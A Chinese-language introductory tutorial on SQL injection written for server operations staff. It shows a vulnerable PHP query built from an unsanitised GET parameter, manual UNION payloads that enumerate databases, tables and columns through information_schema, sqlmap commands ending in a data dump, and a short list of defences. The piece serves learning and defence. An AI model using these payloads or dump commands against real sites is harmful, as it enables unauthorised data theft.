1:为什么要学web漏洞?
作为一个运维人员,日常工作就是保障服务器和网站的业务正常运行,平时也需要对服务器的安全工作加固,说到防护攻击问题,那么久必须去了解攻击者是怎么对服务器发动的一个流程,这样才能更好的针对去做安全防护工作。
2:SQL注入漏洞原理
首先了解下什么是SQL?
结构化查询语言(Structured Query Language),是一种特殊目的的编程语言,是一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统;
以下PHP+MySQL例子:
http://localhost/a.php?id=1’
$id=$_GET['id’];
$sql="SELECT * FROM users WHERE id=$id' LIMIT 0,1";
3:如何去发现sql注入
①通过Web漏洞扫描器工具
②在参数后面添加错误语句
③通过大量的对参数Fuzz测试
④根据自己的一个经验进行判断
4:注入分类
①数字型注入
SELECT * FROM users WHERE id=$id LIMIT 0,1;
②字符型注入
SELECT * FROM users WHERE username=‘admin' LIMIT 0,1;
5:提交方式
①GET
②POST
③COOKIE
④HTTP 头部注入
6:注入方式
①基于报错注入
②基于布尔的盲注
③基于时间的盲注
④联合查询
⑤内联查询
⑥堆叠的查询
7:为什么要学习手工注入?
1. 猜解字段
2. 查看当前数据库
3. Union select 1,group_concat(schema_name),3 from information_schema.schemata%23 // 查询所有数据库
4. union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479%23
//查询数据库中的表
5. UNION SELECT 1,GROUP_CONCAT(column_name),3 FROM information_schema.columns WHERE table_name = 0x7573657273%23
//查询表名中的所有字段
8:sql注入工具sqlmap
sqlmap官网下载地址:
http://sqlmap.org/
sqlmap依赖环境:Python
sqlmap常用的参数
1. 判断注入
python sqlmap.py http://URL -v 3
2. 数据库
python sqlmap.py http://URL --dbs -v 3
python sqlmap.py http://URL –current-user -v 3
3. 表名
python sqlmap.py http://URL --tables -D 数据库名 -v 3
4. 字段名
python sqlmap.py http://URL --column -T 表名 -D 数据库名 -v 3
5. 内容
python sqlmap.py http://URL --dump -T -C 字段名 -T 表名 -D 数据库名 -v 3
9:如何去防护sql注入
①CDN隐藏真实IP地址
②通过安全函数进行过滤
③对数据库最小权限设置
④服务器针对性的WAF防火墙